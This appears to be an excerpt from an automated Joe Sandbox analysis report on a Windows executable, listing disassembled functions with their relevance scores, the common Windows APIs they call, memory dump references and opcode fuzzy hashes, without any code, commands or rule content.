                                                                              • Opcode ID: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                              • Instruction ID: 72e860a1e5610cf2f60718b33953b9e9cfa3de8eae9ff42976e828aecb981d5d
                                                                              • Opcode Fuzzy Hash: 348833bf0fd47251ec8459b694c57c39dac6eb63685dc4ebaa15df7501b8973f
                                                                              • Instruction Fuzzy Hash: 4101F775255B4082EB928F26F9403957360F74EBA0F456220FFAE4B7B4DA3DCA958700
                                                                              Function 0000000140004630 Relevance: 5.1, APIs: 4, Instructions: 80memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetProcessHeap.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046B0
                                                                              • HeapReAlloc.KERNEL32(?,?,?,00000001400047BB,?,?,?,0000000140003E7A,?,?,?,?,00000000,00000001400022A6), ref: 00000001400046C1
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocProcess
                                                                              • String ID:
                                                                              • API String ID: 1617791916-0
                                                                              • Opcode ID: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                              • Instruction ID: 02c5a1d02253778f48d8bcd65850d79aa5baad65f26a42f950a3123f4edab52d
                                                                              • Opcode Fuzzy Hash: e1b55434e6231e5ce6780f684ad3576ffb26ff33b9fae7a8d56a49fd816118fb
                                                                              • Instruction Fuzzy Hash: CB31D1B2715A8082EB06CF57F44039863A0F74DBC4F584025EF5D57B69EB39C8A28704
                                                                              Function 00000001400106B0 Relevance: 4.5, APIs: 3, Instructions: 47COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled$CaptureContext
                                                                              • String ID:
                                                                              • API String ID: 2202868296-0
                                                                              • Opcode ID: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                              • Instruction ID: a6869a7b9d4117274e99734abe304e52ce4a6a571683f9898e15e7d65764808a
                                                                              • Opcode Fuzzy Hash: 905f91afdcc57dbacad6504ae7f65679640b92e152865c9b61e81d303733290d
                                                                              • Instruction Fuzzy Hash: 44014C31218A8482E7269B62F4543DA62A0FBCD385F440129B78E0B6F6DF3DC544CB01
                                                                              Function 00007FFE1A530248 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionRaise_clrfp
                                                                              • String ID:
                                                                              • API String ID: 15204871-0
                                                                              • Opcode ID: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                              • Instruction ID: 3bce42a7c55fc869914d54f505c2ca51c90d060c4033b23d7c8fe6e868c19af0
                                                                              • Opcode Fuzzy Hash: 242015c6cea6594ab8d644b6eea7da2ef8062d64434110bbd4fb3fd5cf8f1a15
                                                                              • Instruction Fuzzy Hash: ACB13B73609B898BEB15CF2AC44636C3BA0FB85F68F1589A2DA5D837B4CB39D451C700
                                                                              Function 00000001400103D0 Relevance: 3.2, APIs: 2, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ByteCharErrorLastMultiWide
                                                                              • String ID:
                                                                              • API String ID: 203985260-0
                                                                              • Opcode ID: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                              • Instruction ID: 2a1840496c7657cf23b6901bcaaf21815035fe120b0a860a82176d8039cbaff9
                                                                              • Opcode Fuzzy Hash: 52eb8cb33472843dab3d23723d723ebc9e780f32240a0bf22a1f45fa5c529dea
                                                                              • Instruction Fuzzy Hash: C871DF72A04AA086F7A3DF12E441BDA72A1F78CBD4F148121FF880B7A5DB798851CB10
                                                                              Function 0000000140010CF0 Relevance: 3.1, APIs: 2, Instructions: 82COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                              • Instruction ID: 31705e6bd3fe747407dbe92e60a9b5f63bdbefd7c066999fadf2412e4a74ef82
                                                                              • Opcode Fuzzy Hash: a23616b521790ba98c8a4ca650accd459689c226ef9c151115ac5421c5afe981
                                                                              • Instruction Fuzzy Hash: BD312B3260066442F723AF77F845BDE7651AB987E0F254224BB690B7F2CFB9C4418300
                                                                              Function 00007FFE1A52A1B8 Relevance: 1.6, APIs: 1, Instructions: 149COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                              • Instruction ID: a2e2cb70dccc353ae14135b3e8bfcc278ecc912ca6f25dce95b5038835a61791
                                                                              • Opcode Fuzzy Hash: 4a2880f174246bb62df44fff46a4d3d73a1dc8eca39573d4fb70521656c567db
                                                                              • Instruction Fuzzy Hash: 9B51C762B0CA81C5EB209BB2A84457A7BA6AB55FA4F1441B7EF5C27AA5DF3CD401C700
                                                                              Function 0000000140011270 Relevance: 1.6, APIs: 1, Instructions: 84COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: EntryFunctionLookup
                                                                              • String ID:
                                                                              • API String ID: 3852435196-0
                                                                              • Opcode ID: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                              • Instruction ID: 0a16dca171e58903ec1b218c91cdb1b04bf095347935d32e98aab42d926b4c07
                                                                              • Opcode Fuzzy Hash: 41b57387ab27fe441920d3618a9a3fade831f152bc6ed6de484845005a0f7214
                                                                              • Instruction Fuzzy Hash: 7A316D33700A5482DB15CF16F484BA9B724F788BE8F868102EF2D47B99EB35D592C704
                                                                              Function 000000014000DDD9 Relevance: 1.6, Strings: 1, Instructions: 301COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID: 0-3916222277
                                                                              • Opcode ID: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                              • Instruction ID: 9b910ad21b0c4e6c2a4c619a0863cbecb71c4e07d0bd79d978466706db7fd7a1
                                                                              • Opcode Fuzzy Hash: 4dbe44af600c182fb51974a0b490eba2bf44001a013ded284afa934d15dcb5c0
                                                                              • Instruction Fuzzy Hash: 2FD1DEF25087C486F7A2DE16B5083AABAA0F7593E4F240115FF9527AF5E779C884CB40
                                                                              Function 000000014000F370 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                              • Instruction ID: a72933d7652eee1ce42449f64e4370b365fbcbea739f10b8ca5cd41f8ceea018
                                                                              • Opcode Fuzzy Hash: e82685a3153856f58f3176b49433fa40cc0a6602fc72f3bc0670cd1eec4d2bc4
                                                                              • Instruction Fuzzy Hash: EDF0FEF261468085EA62EB22B4123DA6750A79D7A8F800216FB9D476BADE3DC2558A00
                                                                              Function 000000014000E178 Relevance: 1.5, Strings: 1, Instructions: 260COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -
                                                                              • API String ID: 0-2547889144
                                                                              • Opcode ID: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                              • Instruction ID: 5aef184856849f1d0e814b0a8e39d0e8e949ccad25035a2bf8530ae42cfb47ec
                                                                              • Opcode Fuzzy Hash: 2c0fe4c55243f33cdb34ec3615e3d347b9ce4ba35bb8967fdbcfce9d52a551a3
                                                                              • Instruction Fuzzy Hash: 5CB1CFF36086C482F7A6CE16B6083AABAA5F7597D4F240115FF4973AF4D779C8808B00
                                                                              Function 000000014000DFFE Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -
                                                                              • API String ID: 0-2547889144
                                                                              • Opcode ID: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                              • Instruction ID: 5cc8c865c9461daf8b0756d8ed2731e20d175c685145385c3f78aef56f479fea
                                                                              • Opcode Fuzzy Hash: d0b365294d50e82b05b46562bde9ad75935525663af60c2549490a2d68dcad7f
                                                                              • Instruction Fuzzy Hash: 5FB1A0F26087C486F772CF16B5043AABAA1F7997D4F240115FF5923AE4DBB9C9848B40
                                                                              Function 00000001400092E0 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                              • Instruction ID: 6026514bbd401dabfdc0327cb8eb2cc9cc42ab70edfd582905dc0376ef34508b
                                                                              • Opcode Fuzzy Hash: 836f1dd34661b3a221f56dc19e791b08cc78d614d7e29c7f03eced68424ee8fe
                                                                              • Instruction Fuzzy Hash: 37B09260A61400D1D605AF22AC8538022A0775C340FC00410E20986130DA3C819A8700
                                                                              Function 000000014000DEFB Relevance: 1.5, Strings: 1, Instructions: 216COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -
                                                                              • API String ID: 0-2547889144
                                                                              • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                              • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                                              • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                                              • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                                              Function 000000014000DDFF Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -
                                                                              • API String ID: 0-2547889144
                                                                              • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                              • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                                              • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                                              • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                                              Function 000000014000DE96 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: -
                                                                              • API String ID: 0-2547889144
                                                                              • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                              • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                                              • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                                              • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                                              Function 000000014000CC00 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                              • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                                              • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                                              • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                                              Function 000000014000C2A0 Relevance: .1, Instructions: 89COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                              • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                                              • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                                              • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                                              Function 00000001400110F0 Relevance: .1, Instructions: 78COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2145995795.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true
                                                                              • Associated: 00000004.00000002.2145977337.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146016749.0000000140014000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146033132.000000014001A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146050932.000000014001E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_140000000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                              • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                                              • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                                              • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                                              Function 00007FFE1A52FD40 Relevance: .0, Instructions: 32COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.2146081341.00007FFE1A521000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE1A520000, based on PE: true
                                                                              • Associated: 00000004.00000002.2146068662.00007FFE1A520000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146098149.00007FFE1A532000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146117176.00007FFE1A53D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000004.00000002.2146133513.00007FFE1A53F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_7ffe1a520000_0b1G0H.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                              • Instruction ID: 76992c8e738af5ab360d327effb16b729809d03812425a59a302f3e32781cdb6
                                                                              • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                                              • Instruction Fuzzy Hash: 58F0C8B171C6518AEB958F29A402A3937D0EB48790F8484BED58C83B14C63C84609F04
                                                                              Function 00000001400038D0 Relevance: 68.5, APIs: 23, Strings: 16, Instructions: 239timeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
